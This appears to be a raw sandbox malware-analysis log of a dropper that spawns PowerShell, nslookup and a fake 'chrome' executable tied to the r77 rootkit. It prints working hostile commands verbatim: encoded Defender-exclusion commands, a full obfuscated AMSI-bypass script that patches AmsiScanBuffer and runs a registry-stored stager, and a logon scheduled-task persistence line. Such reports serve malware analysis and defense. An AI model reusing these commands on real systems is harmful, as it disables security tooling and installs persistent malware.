Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\nslookup.exe C:\Windows\System32\nslookup.exe
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$qKHXRLjxcQb.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');$qKHXRLjxcQb.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$NibVxWxTFc,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');Write-Output $qKHXRLjxcQb.CreateType();}$uYKrZWxknTiUv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$SpNyfScDlNPPHB=$uYKrZWxknTiUv.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RRmRtbQVOsCwqbtFCRP=oBYZxpoBuJDg @([String])([IntPtr]);$CSrLsWTvUKtnfJeCoYnQHQ=oBYZxpoBuJDg 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LbwxtlPJWDL=$uYKrZWxknTiUv.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$UsbtvKZkuSsHuw=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Load'+'LibraryA')));$GBWVSxTZRtiWMYLEL=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Vir'+'tual'+'Pro'+'tect')));$zcmbglj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UsbtvKZkuSsHuw,$RRmRtbQVOsCwqbtFCRP).Invoke('a'+'m'+'si.dll');$NtWqUAjxRFzIehWzj=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$zcmbglj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$QZnCEHiAlz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,4,[ref]$QZnCEHiAlz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$NtWqUAjxRFzIehWzj,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,0x20,[ref]$QZnCEHiAlz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$JkETjFsAcrF.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');$JkETjFsAcrF.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$jXrdWylJno,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');Write-Output $JkETjFsAcrF.CreateType();}$lPmVEIqLxWSBJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$oknnqNPEawtCof=$lPmVEIqLxWSBJ.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PfTqTVeTqNbzEtTZAwA=JcVEStQtPhkP @([String])([IntPtr]);$FBhryrsEcCEQMAYVVFmrjj=JcVEStQtPhkP 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gdWNaSIjpXI=$lPmVEIqLxWSBJ.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$MwCkRVFOfjwTFV=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Load'+'LibraryA')));$PwfBMMcphOddVTLUY=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Vir'+'tual'+'Pro'+'tect')));$FyAgKxj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MwCkRVFOfjwTFV,$PfTqTVeTqNbzEtTZAwA).Invoke('a'+'m'+'si.dll');$GiLFGjttEZsjytHxc=$oknnqNPEawtCof.Invoke($Null,@([Object]$FyAgKxj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$XarcXAurwd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,4,[ref]$XarcXAurwd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$GiLFGjttEZsjytHxc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,0x20,[ref]$XarcXAurwd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\34432.exe Process created: C:\Windows\System32\cmd.exe cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Chrome\chrome.exe C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Users\user\AppData\Roaming\34432.exe Process created: C:\Windows\System32\cmd.exe cmd" cmd /c "C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\Chrome\chrome.exe C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{bb7b2400-d282-40c3-8b5b-9f36c353d0f9}
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Users\user\Desktop\Install.exe Process created: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe
Source: C:\Users\user\Desktop\Install.exe Process created: C:\Users\user\AppData\Roaming\34432.exe C:\Users\user\AppData\Roaming\34432.exe
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Users\user\AppData\Roaming\34432.exe Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Users\user\AppData\Roaming\34432.exe Process created: C:\Windows\System32\nslookup.exe C:\Windows\System32\nslookup.exe
Source: C:\Users\user\AppData\Roaming\34432.exe Process created: C:\Windows\System32\cmd.exe cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Users\user\AppData\Roaming\34432.exe Process created: C:\Windows\System32\cmd.exe cmd" cmd /c "C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{bb7b2400-d282-40c3-8b5b-9f36c353d0f9}
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe"
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\Chrome\chrome.exe C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Users\user\Desktop\Install.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\Desktop\Install.exe Code function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_0040352D
Source: C:\Windows\System32\dllhost.exe Code function: 39_2_0000000140001000 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindCloseChangeNotification,FindResourceA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,OpenProcess,TerminateProcess,CloseHandle,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,CreateThread,Sleep,SleepEx, 39_2_0000000140001000
Source: C:\Windows\System32\dllhost.exe Code function: 39_2_000000014000E010 AdjustTokenPrivileges, 39_2_000000014000E010
Source: C:\Users\user\AppData\Roaming\34432.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Install.exe File created: C:\Users\user\AppData\Local\Temp\nsaDAE.tmp
Source: C:\Users\user\Desktop\Install.exe Code function: 1_2_004021AA CoCreateInstance, 1_2_004021AA
Source: C:\Users\user\Desktop\Install.exe Code function: 1_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 1_2_0040498A
Source: C:\Users\user\AppData\Roaming\34432.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7020:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6876:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6548:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6432:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6416:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Mutant created: \Sessions\1\BaseNamedObjects\9D16FBEF0D8A8F87529DE06A1C43C737
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6828:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:2280:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:6028:120:WilError_01
Source: 34432.exe.1.dr, u200f????????????????????????????????????????.cs Cryptographic APIs: 'CreateDecryptor'
Source: 2.3.ChiefKeefofficialnaxyi_crypted(6).exe.2670000.0.unpack, u000fu2001.cs Cryptographic APIs: 'CreateDecryptor'
Source: chrome.exe.4.dr, u200f????????????????????????????????????????.cs Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.AppLaunch.exe.400000.0.unpack, u000fu2001.cs Cryptographic APIs: 'CreateDecryptor'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\34432.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Install.exe Static file information: File size 4713759 > 1048576
Source: Install.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: x64\Release\r77-x64.pdb source: svchost.exe
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\Install.pdb source: 34432.exe, 00000004.00000002.371180159.000000001702D000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.361388892.0000000013A39000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.356979000.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.360948518.0000000013998000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000003.333426645.000000001C445000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, nslookup.exe, 00000016.00000000.330232590.0000000140000000.00000040.00000400.00020000.00000000.sdmp, nslookup.exe, 00000016.00000000.329876550.0000000140000000.00000040.00000400.00020000.00000000.sdmp, nslookup.exe, 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\Release\r77-x86.pdb source: powershell.exe, 00000019.00000002.430828592.000002C880212000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.462661214.000002C890203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\InstallService64.pdb source: powershell.exe, 00000019.00000002.430828592.000002C880212000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.462661214.000002C890203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.463366324.000002C8902E9000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe
Source: Binary string: x64.pdb source: svchost.exe
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\Release\InstallService32.pdb source: powershell.exe, 00000019.00000002.462661214.000002C890203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp
